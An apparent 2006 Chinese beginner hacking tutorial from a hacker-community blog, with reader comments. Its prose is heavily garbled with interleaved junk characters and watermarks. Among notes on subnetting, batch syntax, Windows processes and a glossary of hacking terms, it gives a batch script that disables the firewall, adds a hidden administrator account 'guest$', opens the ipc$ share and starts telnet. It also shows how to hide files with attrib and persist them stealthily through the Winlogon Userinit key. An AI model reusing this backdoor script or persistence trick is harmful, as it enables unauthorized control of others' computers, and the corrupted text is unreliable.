[原创]黑客基础知识恶补(未完)
上一篇 /
下一篇 2006-10-12 13:11:41 / 天气: 晴朗
/ 心情: 高兴
/ 个人分类:原创文章
查看( 817 ) /
评论( 17 )
2t�a�m�Q%| ] e�i0 国庆放假了,想想自己开学以后学到了什么,总感觉基础知识不牢,于是想回顾一下!于是就写出来让菜鸟
T�j `�?/i�l0★黑基空间★ L�v C�r�]�o:?
们同我一起复习,希望对你们有所帮助!当今这个圈子我们似乎很不幸,为了钱才学习黑客技术的人太多,于是★黑基空间★+L�](U)P�j/P�`
★黑基空间★�D�u j�~;m�l/q�}�]4Y%E
乎共享的精神丧失……★黑基空间★&?
?�U�W�Q9S�b
这里我也不想说太多,记得以前也想找个师傅,结果不是要钱的就是被他们所谓的“高技术”忽悠,再就是丢
+v�p/X7Q�I�K7]�n�u#y5b0
�]�R)D�I7A�O:~6W0下一句现在网络上什么都可以学,只要你想学。我晕,虽说如此但至少我们也要个大致的方向吧,这样才更快、
1D!s.m3M�F�?']�|0
�~.e)h1Q/f�X4X�n�h�b0T0更好地学习黑客知识。渐渐地我也习惯了这些,于是我也开始自学,在这里我向菜鸟们推荐一个好的书《黑客X档
.m�g&D J(G�n�?3L5\�m0
5I�b�?1?�n�S�h0案》,在那里让我学到了许多!
$U"p�x�]�y�t�_0 好了转入正题开始复习基础知识,一些知识也是在网上共享的,当然也要自我分析一下,这样才能够成为我们★黑基空间★(r�R�p6Z�^ _�p R
)|/e
@�h�o�b�a0自己的东西,哈!★黑基空间★3n2y�]�I�@�[
\�G�Y
记得刚开始我是先学习网络的几个协议、IP、局域网的一些知识,于我那个时候就学会了免费上网,破解了一★黑基空间★%x x4j4T�c�T�c
★黑基空间★1l�a�L�\-[�u;]�c
些网吧的限制!在这里大家或许都知道,我就不多说,我只是想着重说一个局域网网关,怎么算子网掩码并根据★黑基空间★�[&r/w6n�E�R8g7c
★黑基空间★�d�z3{�k
Y�b�n%V�p�w�N"Q
她怎么区分C类子网,校园网就是一个例子。http://bbs.hackbase.com/viewthread.php?tid=3017684&highlight=
+Q�j�y;D&C(_%E2O0 接下来就是一些命令吧,这里我就用一些常用的命令和批处理:批处理顾名思议就是成批的一堆命令,然后按★黑基空间★�|�v�U8\
x+S�m
★黑基空间★%O�r%l*h�e0| x
照顺序来执行的扩展名.BAT的文件文件罢了,她的特点是一次建立可多次执行,用她可以很方便地执行我们想要★黑基空间★'V,C�T�w3P6u�]
★黑基空间★1f/[�p2p$b
的一堆命令!当然她的自我运行也是有条件的,必须满足两个条件:一是文件名为AUTOEXEC.BAT,二是该文件的★黑基空间★
G�G7\5a&V&~�C�B*C
�f3W�Q+^.i�h�V0位置必须放在启动盘(也可称为系统盘)的根目录下。或许这些你可能在有些网台已经见过,比如网管们想用她
g8@%e*c�L0★黑基空间★'W,J�y#G
a"U;i�E�S�k
来更新游戏。在这里我估且说是一种语言吧,于是就要学习她的一些语句:
�d�m�s�}&?�X0 1)ECHO--显示方式设置,其中ECHO ON是使以后的命令在执行前先显示,ECHO OFF是使以后的命令在执行前不★黑基空间★�`�X�e9D�{3U
★黑基空间★;J8q�K2K.B
显示,ECHO MASSAGE 是不论ECHO的状态为ON或OFF,都显示MESSAGE所指定的信息。也是是否显示内容语句,一般★黑基空间★,j1Y"u
f�w:t�A
★黑基空间★�v�E3M�Z
V/N
我们是不想让内容显示,所以我们会经常使用他!★黑基空间★9{ _(D;S
c1m*|'X�a�[
2)REM--注释命令。
7t�j�r"\�_�{!v/x�]0 3)PAUSE--暂停系统处理,系统显示Press any key to continue…,等待用户按任意一个键后继续执行。
%h9_�l�?3U�q�A�t*H6u0 4)GOTO--转向子命令,在C中也是跳转语句.★黑基空间★�q�u-P.?0p;e�F�J�c
5)IF--条件子命令。★黑基空间★!n�m5{�~!F)C5V�`�k&U�E
6)FOR--循环子命令。★黑基空间★
e�S(T$~0v�P�\
7)SHIFT--改变参数的位置。(if.for语句不要多说了吧,相信学过C的人一定很了解吧。shift是转换的意思,
%S1o�n�@-W0★黑基空间★�B�e�p�L�E�b+q(Y
W
在这里就是改变参数)★黑基空间★.T'm3^�X�b;L�a�m�S
当然还有@、call,@ 与echo off相象,但它是加在其它命令行的最前面,表示运行时不显示命令行本身。
.N�X�I�O
M�S
P2e0★黑基空间★�^
J�p%H�G h�Q2H m�m
call 调用另一条批处理文件,这里要注意:如果直接调用别的批处理文件 ,执行完那条文件后将无法执行当前★黑基空间★%u,d:^�v6M3z�}
★黑基空间★�B�T�C0b0a b
文件后续命令!学过C的人或许问怎么没有参数,当然有啊,%在C中常见,比如:%f、%c,这些表示输入出的数据
J�m*^)e�Z0★黑基空间★*J�T�t,~�i)]�U
类型为浮点型和整型!%参数是指在运行批处理文件时在文件名后加的字符串。变量可以从 %0到%9,%0表示文件★黑基空间★$v�@�s'q�@�L&D�M9P W
★黑基空间★7w�|#g(E6f
名本身,字符串用%1到%9顺序表示。
4?�y�g3?�x8E�}"\0 接下来我们就来学习一下高级语言: if 、goto 、choice for 学过C我想这些不是问题,本个学过所以在这
)O�V&}"j�_�|$o�P&E)t0
:Z�m�G�~�r�L0@�n�F0里不多说。if是判断条件是否满足,满足就执行,不满足就执行下一条语句,goto就是跳转命令,意思就是遇到★黑基空间★�A7B�A;X V)W�I*U.`+v6n
6a-S;B�R6p�q%_0goto语句将跳到goto 所指定的标号处(标号用 :字符串 表示,标号所在行不被执行)
&j�o�D t'Q�G
W#m$a�o0choice我则用的不多,不好说!★黑基空间★-^(K!S9W/D;R#_�s�f�}
好了下面我们就来个很简单的批处理文件吧!
�D |+H!z
Q�H�Q-P�z+D0 当然批处理中要用到好多DOS命令,我就不多说,想了解清楚到这看看吧!★黑基空间★(\�m7j$X�|�f X�S
★黑基空间★�K%S2l�d�G�A
新人进`看看对你的帮助大不。(斑竹申精)★黑基空间★9Z+C G�m�u�J�W&T3o
常用DOS命令讲解★黑基空间★�J
U;M�R�Z�V�s8g9x:_!Q
★黑基空间★�_.z�z�f�L�o�J.S
在记事本中输入:★黑基空间★%H d*J�p2n)O+W�_�~7I"v�`
@echo off★黑基空间★ h�C�a#I8U�D�S�d%} j#o7K
net stop sharedaccess★黑基空间★�N�[�u�|1a/g
net user guest$ heike /add
:N(c/I3Q�f�i3}0 net localgroup administrators guest /add
�W6s�p�Y�K�q0 net share ipc$
�P)|
k�f#I�w�|;v0 net start telnet 然后把文件保存为12.bat就行!
�s d6i.R%H�Z0最近网上看到一个蛮有意思的批处理文件,是用于记录黑客行踪!
.a�p;t4t2d3M#V/N3D-N0@echo off
;Q%A�x�}7m.k)H
M0 date /t >>d:\3389.txt
�d�^*A*C"d*X#i0 attrib +s +h d:\3389.bat★黑基空间★:L�E�d�X�L�Q-p�~�Q2?
attrib +s +h d:\3389.txt★黑基空间★:`,g7g�p�Y4v�O�r
time /t >>d:\3389.txt
�z�m1L2S�A�d�n0 netstat -an |find "ESTABLISHED" |find ":3389" >>d:\3389.txt
;l
O1T�L�?0然后把文件保存为d:\3389.bat,这里我解释一下命令的意思,date和time是用于获取系统时间的,这样可以让你★黑基空间★([;t
N&a7{�Y9B
7`9r M$k�T�`+Q0知道黑客在某天的某个时刻入侵。“attrib +s +h d:\3389.bat”和“attrib +s +h d:\3389.txt”这两个命令
�Q!N�d%]�U8p�s0★黑基空间★�U�r0g R,O"l�]!r
是用来隐藏3389.bat和3389.txt这两个文件的,因为在登录时,由于会启动d:\3389.bat这个文件,所以会有一个
.Y)i�w�h�|�L�t0
�{:e'@�F�k�z�~0CMD窗口一闪而过,有经验的黑客应该能判断出这窗口是记录用的,所以他可能会到处找这个记录文件,用了以上★黑基空间★�m�D7H�c:v�A9b6R�h
�O;B
d#j!}�|�G0两个命令后,即使他用系统自带的搜索功能以3389为关键字进行搜索,也找不到上面3389.bat和3389.txt这两个
%n�D8y�P7D:I�?0★黑基空间★�q�`)h P�R5}�Y�N�d�D)~:~
文件,哈哈!很棒吧!至于“netstat -an |find "ESTABLISHED" |find ":3389" >>d:\3389.txt”这个命令则是
:N�J�x�n�n0★黑基空间★)s�X�_*C�]�v
记录通过终端的连结状况的,明白了吧!
�f3U3o!w1D&[�L�`0接下来我们要让系统启动时自动运行d:\3389.bat这文件,我用的方法是修改注册表,依次展开:★黑基空间★�J0F&l1o�t�~'Y6U�B�X
�~ o/^ M9D�}&F�u0HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon,找到“Userinit”这个键值,★黑基空间★+u�C3x7A�k,X0S�w
�c&Y'r�r/\0这个键值默认为c:\WINNT\system32\userinit.exe,不知你注意到没有,在最后有一个逗号,我们要利用的就是
e8[-G;U
X @7z0
4f$x�F1@�H Y�C&?0这逗号,比如我上面写的3389.bat文件路径为d:\3389.bat,那么我只要在逗号后面加上“d:\3389.bat”即可,★黑基空间★0v2G�J,P�s#C
★黑基空间★�@�E.u�x�v8k�z+R
这样启动时3389.bat这文件就会运行,选这个键值的原因是因为它隐蔽,如果是加在Run键值下的话是很容易被发★黑基空间★3M*~�?4f8T"}�i/x!@�T�T3L�U�A
.u�I�i8T�K1Q'N0现的。最后提醒一点,键值末尾的逗号别忘了加上去!★黑基空间★�b�@�b�F8h:I/_2F
好了,接下来就是让我们来了解一下系统的一些常见进程和服务!
-u�i%P�n
y�y�^$|�p0 System windows系统进程
/y�[*V�f�p8?�e9H0 进程文件:system idle process用于是显示剩余的cpu资源情况,无法删除该进程。★黑基空间★�{
F.O-S*K
svchost Service Host Process是一个标准的动态连接库主机处理服务,Svchost只是负责为这些服务提供启
�P;_&`1M�{0
*V%p�D�B�?�d0动的条件,其自身并不能实现任何服务的功能,也不能为用户提供任何服务。svchost.exe是一个属于微软★黑基空间★0q9H#T&G�d!L+R
o�g
★黑基空间★!c6f2] z�\$P�U
windows操作系统的系统程序,用于执行dll文件。这个程序对你系统的正常运行是非常重要的。
�?�q,c;f�l0 smss.exe是微软windows操作系统的一部分。该进程调用对话管理子系统和负责操作你系统的对话注意:★黑基空间★-[�u:M�r ^�p+z:\�r#A
�W"s�\;J!d0smss.exe也可能是win32.ladex.a木马。该木马允许攻击者访问你的计算机,窃取密码和个人数据。请注意此进程
)Z
s�o�t9@�u/j0
�a2C/M9@�W-\�c0所在的文件夹,正常的进程应该是在windows的system32和servicepackfiles\i386下面
,o U�q�F�P2i�K7e&k0 ctfmon.exe是microsoft office产品套装的一部分。它可以选择用户文字输入程序,和微软office xp语言
�V�m�t�|�Q0
%B1S�d6E�r%A�}�~0条。这不是纯粹的系统程序,但是如果终止它,可能会导致不可知的问题。★黑基空间★(\4h�e
W#f
winlogon.exe是windows域登陆管理器。它用于处理你登陆和退出系统过程。该进程在你系统的作用是非常
1a�P$G5b�X/{"x2F0
�S*Z�R�G�f4F�O�u0重要的。注意:winlogon.exe也可能是w32.netsky.d@mm蠕虫病毒。该病毒通过email邮件传播,当你打开病毒发★黑基空间★2P8J�^$Z"B#d1V-R/O
�e�T&X x�v"n(O-K0送的附件时,即会被感染。该病毒会创建smtp引擎在受害者的计算机上,群发邮件进行传播。该病毒允许攻击者★黑基空间★,G�I�^,J4Z+W3K
,x+z�~/]+^�P0访问你的计算机,窃取密码和个人数据。请注意此进程所在的文件夹,正常的进程应该是在windows的system32下
�p�v1~-{�u!T-b+e
N0★黑基空间★.l4?�^:j(v
面
#{�P$Z�X�n�e�?-a0 wdfmgr.exe是微软microsoftwindowsmediaplayer10播放器的相关程序。该进程用于减少兼容性问题。这不
�a�}9L#Y
C9[:M0★黑基空间★1D9z�r�O�O"k�F a
是纯粹的系统程序,但是如果终止它,可能会导致不可知的问题。还有好多,我就不多说了,我看到冷漠这了个★黑基空间★)l8i�w�j;]�O
★黑基空间★�l�m5L._#W
文章很好,我也仔细的看了,有的是在他那COPY的!
9p+x�g8d&[�Z.u)x0 进程知识库http://www.dofile.com/★黑基空间★
v�w�n�b�k�_
冷漠【课程】★黑基空间★9W�r�]5d0T.H�i
本人对这些服务还有好多不知道,学习中,当然这些不是能够这么点就能够说完的!
W�D2?�M�n�O�h%B0第四个:黑客名词★黑基空间★�N#_7M�t$Z�c�]
●特洛伊木马源于古代希腊神话战争,用于木马伪装最终获得胜利,现在多是讲木马就是伪装的可以控制你的
�U9`�B�A�B'L
P�^2D�b-|0★黑基空间★.}�q�y�p�B @ x�a
电脑的软件★黑基空间★�F!L�V�i�v
●肉鸡,顾名思义就是被我们控制的电脑就称肉机!★黑基空间★�y2G2[�|�N�c
跳板 一个具有辅助作用的肉鸡,利用这个主机作为一个间接的工具,来入侵其他的主机,并且能够隐藏自
�R9[�f8I
v$L0★黑基空间★�?�c
[�c%^*X {
己IP地址的目的入侵行为就称为跳板!★黑基空间★�h$c�u.@ Y�Z�x
●后门,就是入侵了一台服务器,为了下次再次入侵所做下的动作就简称为后门!
�F�M7@�`�L�Q0 ●什么是DDoS?它会导致什么后果? DDoS也就是分布式拒绝服务攻击。它使用与普通的拒绝服务攻击同样的★黑基空间★%h�m!M0e�P8T4k6w
7R A�p4q�[�a0方法,但是发起攻击的源是多个!她是利用TCP三次握手而使被攻击主机上有大量等待的TCP连接,导致网络中充
7f�Q1S4W-m�@0★黑基空间★�l#A/D!s8f
斥着大量的无用的数据包,造成网络拥塞,使受害主机无法正常和外界通讯!
3J�K+D4N�b(@2U)]$z0 ●SHELL,【电脑】壳,是使用者与系统的界面!webshell是web入侵的脚本攻击工具。简单的说来,webshell
�Z6K�t/z�Z�|�D�z�I#F!E0
?�t5u4M!E(V�C�c�U1O,k0就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器
�e&y0w�p9Z�`)I0
�X:Q,^�j4R N�s0的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务★黑基空间★2{.Q�G�b/N i�Z
�i�Z�r�w�T�@0器,包括上传下载文件、查看数据库、执行任意程序命令等。★黑基空间★:G�O3\�K
t
●什么是蜜罐,这个我是在电视中听过。蜜罐好象是故意让人攻击的目标,引诱黑客来攻击,所有攻击者入侵后★黑基空间★,f�B3E�R&c+E�k
★黑基空间★2x$z*i�z�{�X;b D
,你就可以知道他是如何得逞的,随时了解针对你的服务器发动的最新的攻击和漏洞.还可以通过窃听黑客之间的联
8o.@2V
b�l�D3u,j�s�H0★黑基空间★+X$y�@�K�f3G�B�@3J
系,收集黑客所用的种种工具,并且掌握他们的社交网络.
�@�g�f(n�P�c0 ● 什么是路由器 路由器应该是在网络上使用最高的设备之一了,它的主要作用就是路由选路,将IP数据包正确★黑基空间★�Y%|,Z+S�\#A�A
�B)f�X�`�l*N0的送到目的地,因此也叫IP路由器.★黑基空间★#B1u;~0o,@*s!I)e
●什么是脚本注入攻击(SQL INJECTION) 所谓脚本注入攻击者把SQL命令插入到WEB表单的输入域或也面请求的★黑基空间★'o�x$T5|�~7x9m
�k�M"|�y0[�w�M�P�P0查学字符串,欺骗服务器执行恶意的SQL命令,在某些表单中,用户输入的内容直接用来构造动态的SQL命令,或作为
2\�W8X�l�X�P�s0
7m(]*f c�j#e�o#{�o0存储过程的输入参数,这类表单特别容易受到SQL注入式攻击.★黑基空间★�H*[%a�h�u�i�z%r
当然还有好多,我就不多说了,网上也有很多,搜一下就知道!
�b3r7e�h3T�R�f a0搞了一上午,以后有时间再写!
*d�A�|#o�M�[3q�B0 (未完)★黑基空间★6N�U�B5E5a�n�z�[4e$[★黑基空间★�F4b!r�w6Y�Y�D�_�u(T[
本帖最后由 mpf_hgsf 于 2006-10-3 09:17 编辑]
论坛模式
推荐
收藏
分享给好友
推荐到圈子
管理
TAG:
电脑网络
原创文章
-
mpf_hgsf
发布于2006-10-02 12:10:31
-
自己来顶一下,写了一上午,加上自己的理解,就没有完全COPY,哈……
-
mpf_hgsf
发布于2006-10-02 12:12:25
-
自己来坐板凳!
#N�A6f1_�f�a�J;b�f#Z&B�L真是舒服!
-
huangwei_joy发布于2006-10-02 12:17:35
-
沙发 靠沙发本来是我的!!!来晚了点!!
-
gaoweier00
发布于2006-10-02 12:42:01
-
我也晚了````
-
yxjsj
发布于2006-10-02 18:34:30
-
不错,学习!'Z1?,~�V�J�P�]�^'b6x
…………
-
qxbstc520
发布于2006-10-02 19:46:19
-
还是不错的,我要支持一下
-
poleices
发布于2006-10-02 20:54:09
-
考,好东西啊!!
�t)q�s
F-}"E�U"l7?8Y�]�W●★黑基论坛★● - 全球最大中文黑客社区!!!!!!!!!!!
-
mpf_hgsf
发布于2006-10-03 09:23:54
-
自己顶起,哈哈!space.hackbase.com�E�M�W�N�F%Z�t;|�K&a,t�{
●★黑基论坛★● - 全球最大中文黑客社区�I�^�t�i0m.y2h
以后再写!
-
liuiu286发布于2006-10-03 09:27:24
-
现在大家都出去玩了,我刚刚回来啊,顶
-
什么也不懂
发布于2006-10-03 09:33:20
-
支持原创!!!!!!!!!!!
-
黑客X发布于2006-10-08 10:54:01
-
恩............不错
-
yxjsj
发布于2006-10-08 11:01:30
-
确实是蛮有用的,不过这些还要慢慢学啊
-
ˊ.儍苽メ
发布于2006-10-08 11:17:52
-
加分再看...收藏了...
-
天笑我痴狂发布于2006-10-22 15:51:51
-
挺详尽呀,我也看了好长时间
-
haodarling发布于2006-10-25 20:16:19
-
我看不下去了
�O�| S0_)v$d�\我实在看不下去了)w�e(S�F�I�m
我我我我我我
�l'}!o�g
p★黑基空间★要先顶起再认真认真认真认真看看看
-
haodarling发布于2006-10-25 20:16:41
-
顶!!!!●★黑基论坛★● - 全球最大中文黑客社区�x�C�@�M6a0j$H�G
就一个字!!
:W:J.{4R1\�V黑基论坛,培训,动画,教程,攻击,入侵,挂站,破解,漏洞,扫描,共享,木马,病毒,跳板,监听,嗅探,炸弹,伪装,拒绝服务,防火墙,杀毒软件,入侵检测,身份认证,缓冲溢出,蠕虫,安全工具,攻击程序,加密,解密,外挂,私服,ddos,webshell,sql注入,灰鸽子,冰河,熊猫烧香我!!!
3A B�A�F�_0|:Cspace.hackbase.com只说一次!!!
-
feishao发布于2006-10-26 09:46:14
-
ddd
好贴,希望看到更多的原创.我也是菜鸟....
